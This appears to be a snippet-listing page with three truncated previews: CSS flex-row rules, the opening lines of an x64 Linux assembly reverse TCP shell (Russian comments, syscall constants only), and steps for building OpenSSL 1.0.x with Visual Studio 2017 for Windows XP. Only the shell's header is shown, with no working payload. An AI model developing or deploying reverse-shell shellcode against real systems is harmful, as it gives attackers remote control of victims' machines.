This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
:root { | |
--rows-column-count: 4; | |
--rows-column-gap: 1em; | |
} | |
.row { | |
display: flex; | |
box-sizing: border-box; | |
flex-flow: row wrap; | |
justify-content: flex-start; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; ================================================= | |
; Защищённый реверсивный TCP шелл для Linux x64 | |
; Author: Alan Vivona | |
; ================================================= | |
global _start | |
; Номера системных вызовов | |
syscalls.socket equ 0x29 | |
syscalls.bind equ 0x31 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0. Install Visual Studio 2017 (Community Edtion or whatever), select "Windows XP support". | |
1. Download and unpack OpenSSL 1.0.x sources and prepare build. Mind the paths. | |
"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build\vcvarsall.bat" x86 | |
set PATH=C:\Jom;C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin;%PATH% | |
set INCLUDE=C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Include;%INCLUDE% | |
set LIB=C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Lib;%LIB% | |
set CL=/D_USING_V110_SDK71_ |